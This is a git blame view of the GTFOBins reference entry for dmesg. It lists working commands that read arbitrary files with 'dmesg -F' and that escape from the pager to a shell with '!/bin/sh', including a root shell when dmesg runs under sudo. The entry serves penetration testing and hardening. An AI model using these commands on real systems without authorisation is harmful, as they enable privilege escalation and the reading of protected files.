1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-11-08 07:49:17 +01:00
GTFOBins.github.io/_gtfobins/dmesg.md

18 lines
471 B
Markdown
Raw Normal View History

2018-11-12 15:10:13 +01:00
---
functions:
2020-03-15 06:27:04 +01:00
file-read:
2018-11-12 15:10:13 +01:00
- code: |
2020-03-15 06:27:04 +01:00
LFILE=file_to_read
dmesg -F "$LFILE"
shell:
- description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
code: |
dmesg -H
!/bin/sh
sudo:
- description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
code: |
2018-11-12 15:10:13 +01:00
sudo dmesg -H
!/bin/sh
---